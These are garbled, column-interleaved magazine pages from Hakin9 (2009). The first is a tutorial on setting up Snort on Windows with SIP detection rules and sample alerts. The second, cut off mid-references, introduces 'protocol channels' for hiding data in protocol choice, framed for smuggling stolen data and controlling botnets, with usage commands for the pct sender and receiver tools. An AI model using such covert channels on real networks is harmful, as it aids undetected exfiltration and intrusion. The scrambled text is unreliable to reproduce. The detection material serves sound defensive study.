The installation and configuration Go to the Snort website and follow follow the defaults (Next, Next) provided
information presented is based on the instructions to create a registered in the installer script. At some time
the Snort Install test network diagram. user account. Once created log back during the installation the installer.exe will
Review this when editing files in the in and select Get Snor t. Under the determine if WinPcap is installed on the
following sections as it provides heading Latest Production Snort Release computer, if not, the installer will provide
reference to the Snort configuration – STABLE select click to view binaries prompts to install WinPcap. Follow the
changes being made. The test network and in the win32/ directory download the instructions to install WinPcap as this
consists of a SIP Server providing latest Snort installer.exe for the Windows is necessary for Snort operation. If
registration and proxy services for the operating system. After downloading the necessary to install WinPcap the normal
SIP phone/s for SIP service. The IP Snort executable go back to the Rules Snort installation will continue after its
PBX (hybrid) provides SIP trunking for section and in the upper right column installation. When the full installation
traditional digital and analog telephones enter the DOWNLOAD RULES section. is complete select Close from the
Snort installer and a pop-up Snort has
successfully been installed should be
displayed. Now check the C:\ drive for
������������� the Snort directory, the default location
������������ for installation. When opened there will
be several folders (bin, etc, rules, log)
�����
within the main Snort directory as shown
���� ������
in Screen Capture 1 (see Figure 2).
����
���������
Installing the Snort Rules
������� ������ With Snort installed we continue by
� ������
���
������
installing the default Snort rules. By default
Snort is not installed with rules, this allows
������
������ you to install updated rules as new threats
������ emerge as well as 'roll your own' and add
them as needed without changing the
����� base Snort install. It is recommended to
��������� use an application capable of handling
gzip file extensions as this will maintain
��������������� ���������

the directory structure when opening the


Figure 1. Snort Test Network current Snort rules archive. You can use

6/2009 HAKIN9 29
ATTACK
WinZip but may find the archive opens with configuration/modifications necessary of configuration in this example the
no directory structure and you will have when deploying Snort. Following the EXTERNAL_NET is defined as anything
to identify and unzip the rules files (.rules default installation instructions for Snort other than (! = logical NOT) the HOME _
extension) individually to the C:\snort\rules the snort.conf file is found in the C: NET variable.
directory. Gunzip the Snort rule archive \snort\etc directory. Open the snort.conf
downloaded from the website. When the file using a text editor (WordPad will work) # Set up the external network
archive is opened there will be several to modify the following as instructed. The addresses as well. A good start may
folders displayed. Select and open the sections to be modified are presented in be "any"
rules folder until the rules files are displayed the order they are found in the snort.conf var EXTERNAL_NET !$HOME_NET
as individual files. Select and highlight all file. Simply look through and identify them
the rule files to prepare for extraction to the or use the edit find function. Create the SIP_PROXY_IP
C:\snort\rules folder created during Snort Variable
installation (see Figure 3). Define the Home Network To ease addition and configuration of
Before extracting the files disable (HOME_NET) IP Address the rule sets to be added later (Snocer
any setting in your gzip application that Range and SIPVicious) we'll create a new
maintains directory structure, the rule files As stated in the snort.conf file the Home_ variable in the snort.conf file defined as
MUST be installed as individual files in Net variable consists of the IP address or SIP_PROXY_IP. This variable will represent
the C:\Snort\rules folder as displayed in address range of the systems that reside the exact IP addresses of the SIP devices
Screen Capture 3. This is important when in your internal network, the network(s) the rules will monitor traffic to and from.
defining the location of the rules in the you want to monitor for threat activity. In Simply insert this text as a new definition
snort.conf file later (see Figure 4). our example the home network is the into the snort.conf file at the end of the
192.168.44.0/24 subnet which includes Configure your server lists after the
Configure the snort.conf File three SIP capable devices, a SIP Server/ snmp_server definition keeping with the
This file is used to set the operating proxy, SIP hardphone and IP PBX with SIP convention and order of the snort.conf file.
configuration and parameters of Snort Trunking. Add the IP addresses of the SIP devices
at run time. Before running Snort on in your network. Mind that there is no
Windows platforms changes must be # Set up network addresses you are space between the IP addresses entered,
made to the snort.conf file for proper protecting. A simple start might be just a comma. In our example the SIP
operation. When making the changes RFC1918 capable servers consist of the following
be sure to read the comments available var HOME_NET [192.168.44.0/24] IP addresses; 192.168.44.1 – the SIP
in the snort.conf file as this contains capable IP PBX and 192.168.44.242 – the
useful information regarding the purpose Define the External Network SIP Server / proxy.
of that section, command or process (EXTERNAL_NET) IP Address
and reference the Snort manual for Range # List of SIP servers on your network
the version of Snort in use. Both of The external network variable defines var SIP_PROXY_IP [192.168.44.1,192.16
these will provide insight and a better all the IP network numbers that are not 8.44.242]
understanding between this article and a part of your internal network. For ease
Create the SIP_PROXY_
PORTS Port Variable
Similar to the above creation of a SIP
proxy variable, in addition to monitoring
activity to and from the SIP server IP
addresses, we will specify ports to focus

Figure 3. Screen Capture 2 Figure 4. Screen Capture 3

30 HAKIN9 6/2009
ATTACK
and monitor activity on. In the snort.conf # (same as command line option is enabled by default. We've changed
file find the section Configure your service --dynamic-preprocessor-lib-dir) the Port Scan preprocessor setting in
ports and insert the new port variable # this instance for a sense_level of high
(portvar) called SIP_PROXY_PORTS dynamicpreprocessor directory \snort\ to provide increased detection of port
as shown at the end of the service lib\ scans during your testing. You may want
ports listings. As stated earlier this port snort_dynamicpreprocessor\ to set this back to the defaults in a live
variable will be used with the Snocer environment to prevent a high number
and Sipvicious rules added in the later Comment out the Dynamic of alerts. Refer to the Snort manual for
section. Per the IETF RFC's TCP and UDP Engine Function additional information on what the settings
port 5060 is the default port used for SIP The Dynamic Engine function in Snort is listed (proto, scan _ type) provide.
control communications. designed to allow advanced users to write
and import rule code into Snort at runtime. preprocessor sfportscan: proto { all
# List of SIP server ports The statement is found in the Step 2: } \
portvar SIP_PROXY_PORTS 5060 Configure Dynamic Load Libraries section. scan_type { all } \
This function is unused in this basic memcap { 10000000 } \
Modify the Rules Path deployment and is to be commented out sense_level { high }
When Snort is started it will load rule files – add the # sign in front of the statement.
and it must know where to find them. You Failing to do this may result in an error at Set the Directory Location of
have to modify the directory location of runtime and the Snort install exiting! the classification.config
the Snort rules and preprocessor rule The classification.config is used to classify
path to absolutes as recommended for # Load a dynamic engine from the and set priority levels to rules regarding the
Windows operation. Typically intended for install path severity of the incident that triggered the
installation on other than Windows based # (same as command line option rule. As you advance in Snort operation you
operating system devices the directory –dynamic-engine-lib) can configure, modify and add your own
/ identifier in the original snort.conf must # dynamicengine /usr/local/lib/ classifications, this will allow you to control
be changed to the directory path symbol snort_dynamicengine/libsf_engine.so alerts and notifications (such as email
used with Windows. Remember that earlier alerts) to focus on your priorities. The file is
in the installation the rules were placed as Change the Preprocessor loaded by default and the directory location
individual files in the C:\snort\rules directory. Sfportscan Option change is required for the Windows
A port scan is usually one of the first steps operating environment (see Listing 1).
# Path to your rules files (this can before the initiation of further malicious
be a relative path) activity. For the attacker the port scan Set the Directory Location of
# Note for Windows users: You are serves several functions but is commonly the reference.config
advised to make this an absolute used to identify open ports, operating The reference.config provides a listing
path, systems and services that may be of external sources providing further
# such as: c:\snort\rules vulnerable to known or unpatched exploits. information on the activity that triggered
var RULE_PATH c:\snort\rules The Snort 2.8.4 portscan preprocessor the rule. This file is also loaded by default
var PREPROC_RULE_PATH c:\snort\
lib\dynamic_preprocessor
Listing 1. Classification.config

Modify the Dynamic # Include classification & priority settings

Preprocessor Statement # Note for Windows users: You are advised to make this an absolute path,
# such as: c:\snort\etc\classification.config
Snort has preprocessors that provide #
increased detection by allowing packet
streams to be analyzed, this is in addition
include c:\snort\etc\classification.config
to the packet by packet monitoring against
the rules. This statement is found in the Listing 2. Reference.config
Step 2: Configure Dynamic Load Libraries
# Include reference systems
section. Locate and modify the dynamic
# Note for Windows users: You are advised to make this an absolute path,
preprocessor statements and the directory # such as: c:\snort\etc\reference.config
path as shown for loading and operation #
in the Windows environment.
include c:\snort\etc\reference.config

# Load all dynamic preprocessors from


the install path

32 HAKIN9 6/2009
UNIFIED COMMUNICATIONS INTRUSION DETECTION

and the directory location change is save as to the new file name snort.conf1 snort.conf file, is it necessary to enable
required for the Windows operating with a 'text only' file extension as shown in all the preprocessors? When adding
environment (see Listing 2). Screen Capture 4 (see Figure 5). rules guard against duplication and focus
the rules on what you want to monitor
Add the voip.rules and New A Note About Optimization for and trigger against. For example;
sip1.rules File This is a How To article and although the we're interested in monitoring SIP traffic
As mentioned earlier Snort loads rules detail is beyond the scope presented destined for UC servers and services.
on start-up and then compares the here is a word on optimization before Do you need to include and load the
monitored traffic against the rules to moving on to adding additional rules. It's Oracle.rules from the rules directory if the
trigger alerts. Snort includes voip.rules obvious to computer professionals that UC servers do not use Oracle? As you
in the rules directory for the detection of the more you have an application do the gain experience with Snort operation and
many SIP based attacks but this rule file more it can affect performance. Snort configuration knowing the applications
is not loaded by default in this version of is no different. Think. Where will Snort be and traffic streams of the services
Snort, we will need to include these rules deployed in the network and what you are being monitored can provide a good
at runtime. In the next section you will be monitoring for? What type of traffic will be starting point when optimizing Snort at
provided with instructions to download and passing through it? Are you monitoring runtime. Optimization in a heavy traffic
modify additional rules to detect malicious a broad array of servers and services or environment could mean the difference
SIP activity and add these to the existing focused like presented here? Review the between seeing the traffic and alerting or
Snort rules as well. When the additional
rules are downloaded and modifications
Listing 3. Snocer rule changes
completed the new rules will be saved
to a file named sip1.rules. For both rules #Here customize variables in order to fit your network
#Port where SIP proxy is listening
(voip.rules and sip1.rules) to be included at
#var SIP_PROXY_PORTS 5060
runtime Snort has to be instructed to load
the files via the snort.conf. Near the end of #SIP proxy IP address
the snort.conf file you will see the $RULE _ #var SIP_PROXY_IP any
# Example: var SIP_PROXY_IP 192.168.1.110
PATH statements which are the rules Snort
is instructed to load at runtime from the #Used DNS server address
rules directory. Find the existing $RULE _ #var DNS_SERVERS any
# Example: var DNS_SERVERS 192.168.1.20 192.168.1.30
PATH/pop3.rules and immediately after
it insert two new include $RULE _ PATH #Known SIP proxy addresses
statements to load the Snort voip.rules #var KNOWN_PROXY _ENTER_HERE_
and the sip1.rules as shown below.
################### PORTSCAN preprocessors #######################
#Example of configuration of Portscan Detector:
include $RULE_PATH/voip.rules #alert when more then 5 ports is scaned within 7 seconds
include $RULE_PATH/sip1.rules #preprocessor portscan: $SIP_PROXY_IP 5 7 (port scans set in snort.conf file)

Save the New Listing 4. SIPVicious rule changes


snort.conf1 File
After completing the changes and checking alert ip any any -> $SIP_PROXY_IP $SIP_PROXY_PORTS \
(msg:"OPTIONS SIP scan"; content:"OPTIONS"; depth:7; \
for accuracy save the snort.conf file with threshold: type both , track by_src, count 30, seconds 3; \
sid:5000017; rev:1;)

alert ip any any -> $SIP_PROXY_IP $SIP_PROXY_PORTS \


(msg:"Excessive number of SIP 4xx Responses – possible user or password guessing
attack"; \
#pcre:"/^SIP\/2.0 4\d{2}"; \
threshold: type both, track by_src, count 100, seconds 60; \
sid:5000018; rev:1;)

alert ip any any -> $SIP_PROXY_IP $SIP_PROXY_PORTS \


(msg:"Ghost call attack"; \
content:"SIP/2.0 180"; depth:11; \
threshold: type both, track by_src, count 100, seconds 60; \
sid:5000019; rev:1;)

Figure 5. Screen Capture 4

6/2009 HAKIN9 33
ATTACK
missing it. If the intruder is knowledgeable naming convention being using to identify changed to 5000017. The use of the sid
they may purposely flood the NIDS in SIP device IP addresses. For our purposes will become apparent later when testing
an attempt to slip malicious traffic past here we do not want to alert on internal and reviewing alerts (see Listing 4).
without alerting you. traffic to the SIP devices ports, only Note the second rule pcre statement
external traffic. is commented out. During testing the
Retrieve and Modify the Change from: second SIPVicious rule (msg:Excessive
Snocer Rules number of SIP 4xx responses) calls a
Time to add the additional rule sets alert ip any any -> $HOME_NET $SIP_ version of PCRE (Perl Compatible Regular
mentioned to increase detection of PROXY_PORTS \ Expressions) not available by default in
malicious SIP traffic. Go to the Snocer (msg:"OPTIONS SIP scan"; content: the Snort installation presented here. To
website (www.snocer.org) and select "OPTIONS"; depth:7; maintain the How to nature intended this
Publikations and download the sip- rule line has been simply commented
rules.zip. Open / unzip the Snocer sip- Change to: out at this time to prevent calling and
rules archive and extract the sip.rules file. running the pcre function. Be advised the
Note the additional information available alert ip any any -> $SIP_PROXY_IP rule is still functional. When all changes
for your IDS education and review. have been completed and checked
Open the sip.rules file with WordPad $SIP_PROXY_PORTS \ for accuracy save the sip1.rules file
and comment out the following at the (msg:"OPTIONS SIP scan"; content: and place a copy in the C:\Snort\rules
beginning by placing the # in front of "OPTIONS"; depth:7; directory.
each statement as shown. Earlier we
defined the $SIP _ PROXY _ IP and All SIPVicious rules will require the sensor Starting Snort
$SIP _ PROXY _ PORTS variables in the id (sid) be changed. According to the Let's recap and make final checks. The
snort.conf1 file instead of relying on the Snort manual the sid is used to provide Snort Windows installer and rules were
definitions here. In addition comment out a unique identifier for Snort rules. Local downloaded from the Snort website.
the PORTSCAN preprocessor statement rules (the ones you build and include) Snort was installed on a Windows based
in the sip.rules file as the Snort port scan should use sid numbers greater than platform using the default installation
function has been set for our purposes in 1,000,000. Renumber the SIPVicious prompts. The Snort rules were gunzip and
the earlier snort.conf section (sfportscan) rules sid numbers in a contiguous order installed in the C:\snort\rules directory.
(see Listing 3). keeping with those in the Snocer rules. The The original snort.conf file was modified
After completing and reviewing the last Snocer rule has the sid of 5000016 per the instructions provided and saved
changes for accuracy save the Snocer so the first SIPVicious rule will have the sid as the snort.conf1 file in C:\Snort\etc
sip.rules with the save as function to the
new file name of sip1.rules as a text only
file.

Retrieve and Modify the


SIPVicious Rules
Go to the SIPVicious rules website (http:
//sipvicious.org/resources/snortrules.txt),
three rules should be displayed. Select
all and copy and paste these rules to a
new WordPad document. Save the new file
(save as) sipv.rules and remember to save
the file as 'text only'. Reopen the sipv.rules
file and copy and paste the rules to the
recently created Snocer sip1.rules file
after the end of the last Snocer #UNION Figure 6. Screen Capture 5
statement injection: rule.
With the sipv.rules copied into the
sip1.rules file you can make them easier
to read by separating the sipv.rules
with a line space as shown in Listing 4.
Change the first SIPVicious rule variable
$HOME _ NET to the $SIP _ PROXY _ IP
variable name to maintain the variable Figure 7. Screen Capture 6

34 HAKIN9 6/2009
UNIFIED COMMUNICATIONS INTRUSION DETECTION

directory. The Snocer and SIPVicious rules directed to. When starting Snort this will be instructions to start Snort (See Listing 5).
were retrieved, combined, modified as the interface number specified in the Snort As Snort loads data will scroll quickly
instructed and saved as the sip1.rules file start command to connect to. through the DOS screen. Monitor the
and a copy placed in the C:\Snort\rules screen for error reports, if an error was
directory. You have a managed layer 2 / 3 • Adapter for generic dialup (a dial-up made in the configuration changes
switch capable of port mirroring and the modem is installed) this will be detected and Snort will exit
platform with Snort installed is connected • The Intel PRO/1000 MT Network the run process and report where it
to the port receiving the mirrored traffic. It's Connection (the Ethernet interface) stopped and for what reason. The Snort
almost time to run Snort and monitor for (see Figure 6). errors are relatively easy to read and
malicious traffic. understand even for the uninitiated.
Before entering the command to run With the ethernet interface number known Search for and correct any errors and
Snort the interface on the machine that enter the command to start Snort in try starting Snort again. Assuming
Snort will connect to and monitor traffic on the Network Intrusion Detection System no errors after a short time Snort is
needs to be identified. Open a Command (NIDS) mode with packet logging. Enter the successfully started and the DOS
Prompt window (DOS window) and command below in the Command Prompt Window will display the Initialization
change to the C:\snort\bin directory. Enter window at the C:\Snort\bin prompt (see Complete message in Screen Capture 7
the command snort -W shown in Screen Figure 7). (see Figure 8).
Capture 5. The response provides details Congratulations – you have
on the version of Snort installed and the snort –i2 –l c:\snort\log –c c: successfully configured and are using
interfaces found on the machine. Make \snort\etc\snort.conf1 Snort on a Windows platform as a NIDS
note of the interface number assigned for your UC servers and services!
to the Ethernet interface (in this instance Reviewing the Snort manual the
number 2) that the 'port mirrored' traffic is command breaks down to the following Testing and Reading Alerts
Any new application or equipment
deployed requires due diligence testing
Listing 5. Snort command breakdown
to ensure it is working properly and as
snort – start the snort.exe designed. Test your Snort deployment.
-i2 – on interface number 2
There are SIP specific testing tools as
-l – logging enabled
c:\snort\log – to this directory location well as others available across the web
-c – start snort using a configuration file that can be used to test the rules are
c:\snort\etc\snort.conf1 – located in this directory and the files name
working and reporting as intended. The
tools selected for testing, their installation
Listing 6. Sivus scan alert
and operation is left to the reader but
[**] [1:12003:2] VOIP-SIP CANCEL flood [**] a basic review of reading Snort alerts
[Classification: Attempted Denial of Service] [Priority: 2]
will be presented here. In our starting
04/22-15:28:23.824288 192.168.42.253:5060 -> 192.168.44.242:5060
UDP TTL:127 TOS:0x0 ID:15430 IpLen:20 DgmLen:966 statement Snort was instructed to log
Len: 938 alerts to the C:\snort\log directory.
[Xref => http://www.ietf.org/rfc/rfc3261.txt] When traffic matches a rule and an
alert is generated it will be listed in a
[**] [1:12003:2] VOIP-SIP CANCEL flood [**] file called alert.ids in this directory. The
file can be opened and viewed with a
text editor such as WordPad. In addition

Figure 8. Screen Capture 7 Figure 9. Screen Capture 8

6/2009 HAKIN9 35
ATTACK
you will find the packet that matched sid's, perhaps not being included in the the Type of Service (TOS), or DiffServ, is
the rule alert captured and listed in default installation, unfortunately do not not set (zero), the IP packet identification
the snort.log.<number> file. This file appear when searched. number is 15430, the IP header length is
can be appended with the extension 20 bytes, the total length of the IP packet
.cap (snort.log.<number>.cap) and [Classification: Attempted Denial is 966 bytes. The next line of the display
opened in a packet capture application of Service] [Priority: 2] notes the data length of the packet, 798
such as Wireshark for review. The bytes.
alerts.ids and snort.log file mentioned The rule is written with a classification
can be seen in Screen Capture 8. In statement which is included in the default [Xref => http://www.ietf.org/rfc/
the Snort operation presented here classification.config file provided with rfc3261.txt]
the files are not accessible for viewing Snort. A review of the classification.config
when Snort is running, to open and view file shows that the rule is classified as an The last line of the alert displays the
them stop Snort by entering Ctrl c in the Attempted Denial of Service with a priority reference for this alert. The rule has a
Command Window running Snort (see of 2 (out of 1 to 3, 1 being the highest) reference statement written in it which is
Figure 9). severity alert. included in the default reference.config
Note that rules are unique and file provided with Snort. You can connect
generate alert data with information 04/22-15:28:23.824288 192.168.42.253: to this reference site to view additional
specific to what that rule was written to 5060 -> 192.168.44.242:5060 information regarding the alert. In this
match and alert for. The basic review instance the IETF RFC 3621, the SIP RFC.
presented here will provide only an This line lists the date (04/22) and time The packet triggering the rule is saved
overview of the information provided in an (15:28:23) the alert was triggered at in the snort.log.<number> file. The alert
alert. It is strongly recommended to review as well as the source IP address and information may be easier to follow by
the Writing Snort Rules section of the port the traffic originated from and searching for the packet (by packet ID) in
Snort manual for a detailed understanding the destination IP address and port the snort.log.<number>.cap file. Shown
of rules, their construction and alert the traffic was sent to. The traffic was in Screen Capture 9 is a section of the
information. received from 192.168.42.253 port 5060 packet captured for the SIP CANCEL alert
Our intent is to demonstrate that and was directed to (>) 192.168.44.242 reviewed. Remember we can change
the SIP based rules we added are port 5060, the SIP Proxy Registrar in the the snort.log.1240513919 (our example
functional. For one test SiVus (http: test network. shown) to a .cap extension and open this
//www.vopsec.net/ ) a SIP network for viewing in a packet capture application
scanner initiated a scan to a target in UDP TTL:127 TOS:0x0 ID:15430 IpLen:20 (Wireshark is shown in Figure 10).
the UC subnet – 192.168.44.242. With DgmLen:966 Additional testing was performed
the scan completed and Snort stopped Len: 938 to generate alerts for the Snocer rules
the alert.ids file was opened from the C: added to the installation to ensure they
\snort\log directory. Within the file the In the first line above it is shown this is an are functioning as intended. Below is the
following alert was found (see Listing 6). UDP packet, the Time To Live (TTL) is 127, example of one Snocer rule which was
The first line of the alert displays the
following information; 1: = number of times
the alert is triggered, 12003: = the sensor
id of the rule, 2 = the revision number
of the rule. The VOIP-SIP CANCEL is the
message (msg:) portion of the rule. It is
easily determined by the msg : that this
rule is written to monitor for SIP CANCEL
message traffic. A cancel flood could be
an attempt to end legitimate SIP calls
as well as find other flaws in SIP device
operation. The rule for this alert can be
found in the Snort voip.rules added to
the installation earlier. Search for the 'sid'
(12003) in the voip.rules file for review. The
Snort website (www.snort.org) offers the
ability to search for rule sid numbers, this
can be found just above the account login
on the main page. Note that the voip.rules Figure 10. Screen Capture 9

36 HAKIN9 6/2009
UNIFIED COMMUNICATIONS INTRUSION DETECTION

matched and generated an alert during This line lists the date and time the alert The final exampled provided below is
testing (see Listing 7). was triggered, the source IP address an alert from a SIPVicious rule. The alert
The first line of the alert displays the and port the traffic was sent from and was generated by simply providing an
following information; 1: = number of the destination IP address and port incorrect password to a SIP Softphone
times the alert is triggered, 5000004: = the traffic was sent to. The traffic was and attempting multiple logins to the
the sensor id of the rule, 1 = the revision received from 192.168.1.130 port 5060 SIP registrar. After the previous alert
number of the rule. The INVITE message and was directed to 192.168.44.242 port examples and reviewing the format and
flooding is the message (msg:) portion 5060, the SIP Proxy Registrar in the test information provided should be apparent
of the rule. This rule can be found in the network. and understood by the reader (see
Snocer sip1.rules modified and added Listing 8).
earlier. Search for the 'sid' (5000004) UDP TTL:96 TOS:0x88 ID:11392 IpLen:20 When performing your testing, review
in the sip1.rules file you see the rule is DgmLen:826 the rules you are attempting to trigger
written to monitor for SIP Invite message Len: 798 and the Snort manual. Many of the
flooding. Snocer and SIPVicious rules added are
In the first line above it is shown this is written with threshold statements. This
[Priority: 0] an UDP packet, the Time To Live (TTL) is can been seen in the sid modifications
96, the Type of Service (TOS), or DiffServ, section of the SIPVicious rules presented
The rule is written with no classification is set for 88, the IP packet identification earlier. Thresholds are basically
statement and with no classification by number is 11392, the IP header length composed of two parts; a count and a
default displays a Priority of 0(zero). Not to is 20 bytes, the total length of the IP time. Only when the count is reach within
be confused as a higher priority than the packet is 826 bytes. The second line the time will the rule trigger an alert.
rules included with a classification in the of the display notes the data length of During testing you can lower either the
Snort classification.config file. the packet, 798 bytes. The rule was not count or the time to demonstrate the rule
written with a reference so no reference is working in a test environment. During
04/22-15:42:39.628304 192.168.1.130: line is displayed, this is the last line live deployments a measure of fine tuning
5060 -> 192.168.44.242:5060 displayed for this alert. the Snort rules may be necessary and
beneficial. You want to focus on what is
a real threat and not encumbered with
On The 'Net investigating false alerts.
• http://www.ietf.org/
• http://www.snort.org Conclusion
• http://www.snocer.org The goal of this article was two fold;
• http://code.google.com/p/sipvicious bring awareness of a potential new
• http://www.vopsec.net/ target of attacks and provide a start to
• http://voiper.sourceforge.net/ those unfamiliar with installing and using
• http://en.wikipedia.org/wiki/Unified_communications
NIDS monitoring to provide early warning
of activity directed against SIP devices.
Network intrusion detection is a powerful
addition to any security tool set. As you
Listing 7. Snocer rule alert
gain knowledge and experience with
[**] [1:5000004:1] INVITE message flooding [**] Snort, Snort can provide more advanced
[Priority: 0]
features and functions as well. With a
04/22-15:42:39.628304 192.168.1.130:5060 -> 192.168.44.242:5060
UDP TTL:96 TOS:0x88 ID:11392 IpLen:20 DgmLen:826 little practice you can load your UC Snort
Len: 798 configuration to a key drive and easily
and quickly deploy it in a live environment
[**] [1:5000004:1] INVITE message flooding [**]
to monitor for suspicious activity.
Listing 8. SIPVicious rule alert

[**] [1:5000018:1] Excessive number of SIP 4xx Responses – possible user or password
guessing attack [**]
Mark Rubino
[Priority: 0] Mark Rubino works for a major unified communications
04/22-15:42:39.628304 192.168.1.130:5060 -> 192.168.44.242:5060 equipment manufacturer and has been involved with
UDP TTL:96 TOS:0x88 ID:11392 IpLen:20 DgmLen:826 the emerging field of Voice over IP (VoIP) security for
Len: 798 the past several years. He is focused on bringing
security awareness, cost effective security practices
and architectures to the small to medium enterprise
business sector, a sector that he believes doesn't
receive the security attention of larger enterprises

6/2009 HAKIN9 37
ATTACK
STEFFEN WENDZEL

Protocol
Channels
Difficulty

Covert channel techniques are used by attackers to transfer


hidden data. There are two main categories of covert channels:
timing channels and storage channels. This text introduces a new
storage channel technique called protocol channels.

A
protocol channel switches one of detect. A typical packet would be a HTTP-
at least two protocols to send a bit Request seen hundreds of times each day in
combination to a destination. The main a typical network. The HTTP-Header would not
goal of a protocol channel is that the packets include any kind of hidden information itself.
sent look equal to all other usual packets of The payload may also be free of any hidden
the system what makes a protocol channel information.
hard to detect. • It is also important that a protocol channel
only uses usual protocols of the given
Introduction network since protocols unusual for the
For attackers it is usual to transfer different kinds network would be easy to detect. An
of hidden information trough hacked or public interesting algorithm to identify such
networks. The solution for this task can be to use protocols for adaptive covert channels (I call
a so called covert channel technique like they are them protocol hopping covert channels and
known since many years. invented them earlier) was introduced by
A new storage channel technique I call [YADALI08].
protocol channel includes hidden information
only in the header part of protocols that specify The higher the number of available protocols
an encapsulated protocol (e.g. the field Ether for a protocol channel is, the higher amount
Type in Ethernet – Table 1 lists more of such of information can be transferred within one
protocol header parts). For example: If a packet since more states are available. Given
protocol channel would use ICMP and ARP, the above example, 2 different states are
while ICMP means that a 0 bit was transfered available, which represents 1 bit. If the attacker
WHAT YOU WILL
LEARN... and ARP means that a 1 bit was transfered, could use 4 different protocols, a packet would
then the packet combination sent to transfer represent 2 bits. Figure 1 shows a sample
The basics of network covert
channels the bit combination 0011 would be ICMP, ICMP, protocol channel using 4 different protocols
How protocol channels work and ARP, ARP. This sounds easy but there are two where each packet represents 2 bits of covert
how one can use them important things to mention: information.
This does not allow high covert channel
WHAT YOU SHOULD
KNOW... • A protocol channel may not contain any other bandwidths but is more than enough to transfer
Basics of Covert Channels
information that identifies the channel nor sniffed passwords or other tiny information.
(optional) other hidden information because this would The need for a high bandwidth decreases
Basics of TCP/IP. make the protocol channel much easier to dramatically if the attacker uses some

38 HAKIN9 6/2009
A NEW METHOD TO COMMUNICATE MORE STEALTHY

compressing algorithm (like modify Protocol channels and protocol channels.


an ASCII text by converting it to a 6 bit Hopping Covert Channels The main difference is that protocol
representation of the most printable If you already know Protocol Hopping channels modify no information of a
characters). The proof of concept code Covert Channels then you may ask network packet excluding the protocol
pct uses a minimalized 5 bit ASCII what the difference is between /these/ identifier of the encapsulated protocol.
encoding and a 6th bit as a parity bit.
You can find pct on the Hakin9 website. Table 1. Parts of Headers used to include Protocol Channel information
Layer / Protocol Used Part of the Header
Proof of Concept Network Access Layer / Ethernet Ether Type
Implementation
There is a tiny proof of concept Network Access Layer / PPP Protocol
implementation for Linux 2.6 called pct Internet Layer / Ipv4 Protocol
(protocol channel tool) available. As Internet Layer / Ipv6 Next Header
already mentioned, pct uses a 5 bit
Transport Layer / TCP and UDP (Source and) Destination Port
ASCII encoding and adds a 6th parity
bit.
This is possible because most
unprintable characters are not included What are Covert Channels?
A definition of covert channels can be found in [BISHOP06]: A covert channel is a path of
here. All lower case characters are made
communication that was not designed to be used for communication. He also defines the
upper case. Digits are also not available difference between the two main categories of covert channels: A covert storage channel
since it is possible to write them as text uses an attribute of the shared resource. A covert timing channel uses a temporal or ordering
(ONE instead of 1). relationship among accesses to a shared resource. The TCSEC standard includes a similar
pct uses the Perl modules CPAN/Net: definition: Covert storage channels include all vehicles that would allow the direct or indirect
:RawIP and CPAN/Net::ARP and is based writing of a storage location by one process and the direct or indirect reading of it by another.
Covert timing channels include all vehicles that would allow one process to signal information
on ARP and ICMP packets while ARP
to another process by modulating its own use of system resources in such a way that the
has the meaning of a zero bit and ICMP change in response time observed by the second process would provide information.
packets have the meaning of a 1 bit. Due [DOD85].
to the fact that ARP is used, the proof of A covert channel that changes an attribute of a HTTP header (e.g. the cookie field to include
concept code can only transfer hidden hidden information in the cookie value) would be a storage channel. Instead the covert channel
information within a subnet. could measure the manipulated response time for HTTP requests what whould be a typical
timing channel.
After a typical break in the attacker
could use pct to stay hidden while
transferring secret (stolen) data using
the pct protocol channel. It is also �����������
possible that an attacker could use
pct to send hidden information into a
hacked network to control bots which ����
are part of a botnet.
To use pct, one first has to start the
receiving component called pct_receiver.
It takes the network device to listen on as
������ ��������
a parameter (e.g. eth0 or lo). Listing 1
shows how to do that. ���

The sending component pct _


sender takes more parameters: (1) The
network interface to send from, (2) the
source IP address, (3) the destination IP ���
address, (4) the source MAC address,
(5) the destination MAC address, (6)
the initial value for the ICMP sequence
number (e.g. 0x053c) of the ICMP echo
packets and (7) the secret message
����
to send trough the protocol channel. �����������
Listing 2 shows an example call of the
program. Figure 1. A protocol channel transfering bits using a set of 4 different protocols

6/2009 HAKIN9 39
ATTACK
This makes protocol channels much Problems protocol channel, the whole channel would
harder to detect than protocol hopping Since a protocol channel only contains be de-synchronized. It is not possibly to
covert channels. Following the definition one or two (usually not more) bits of identify packets which (not) belong to the
of a protocol hopping covert channel, hidden information per packet, it is not protocol channel if they use one of the
a protocol channel could be defined possible to include reliability information protocols the protocol channel uses.
as a special kind of a protocol hopping (like an ACK flag or a sequence number) This lack of a micro protocol (a
covert channel. The next subsection in such a packet. If a normal packet that covert protocol that includes meta
shows some problems related to this doesn't belong to the protocol channel information for the transferred covert
difference. would be accepted by the receiver of a data) that implements reliability and a
identification information is also one of
the mayor differences between protocol
Listing 1. Start of pct_reciever
channels and protocol hopping covert
$ sudo ./pct_receiver eth0 channels.
RECEIVING MESSAGES -
Another problem is the fragmentation
PRESS CTRL-C TO FINISH
as well as the loss of packets. If a packet
Listing 2. Using pct_sender.pl to send the String “HELLO” was de-fragmented, the receiver would
receive it two times what means that the
$ sudo perl ./pct_sender.pl eth0 \
192.168.2.22 192.168.2.21 \ bit combination of the received packet
00:1d:09:35:87:c4 \ would be used twice what would result
00:17:31:23:9c:43 0x053c \ in a destroyed bit sequence on the
receiving system.
"HELLO''
The channel would end up de-
sending payload[0]=H synchronized in this case too. A receiver
sending=00111 could check for packets that include the
sending bit 0=0 ARP
sending bit 1=0 ARP
More Fragments flag of IPv4 as a solution
sending bit 2=1 ICMP for this problem. Lost packets create a
sending bit 3=1 ICMP hole in the bit combination what results in
sending bit 4=1 ICMP
the same de-synchronization problem.
Seqnr now=1343
...
Conclusion
Protocol channels provide attackers
a new way to stay hidden in networks.
What are Protocol Hopping Covert Channels Even if a detection by network security
Protocol Hopping Covert Channels are storage channels that have a set of at least two different monitoring systems is possible – e.g.
network protocols to use. They switch their used protocol while transferring secret information. because of unusual protocols used
For example: They use the HTTP cookie value as well as a POP3 message number to hide by the attacker – a regeneration of the
data in. Then a first packet could be an HTTP request and a second packet could be a POP3
hidden data is as good as impossible
RETR command to send such information. The next packet could be HTTP (or POP3) again.
since it would need information about the
If one of the protocols used is detected, the other protocol is still undetected. This makes a
forensic analysis much harder. I described Protocol Hopping Covert Channels in more detail in transferred data type, the way the sent
[WEND07]. protocol combinations are interpreted
(big-endian or little-endian) and a
recording of all sent packets to make a
regeneration possible.
References Due to this fact, protocol channels
• [BISHOP06] Bishop, M.: Computer Security: Art and Science, Addison-Wesley, 9th Printing, are much harder to detect than protocol
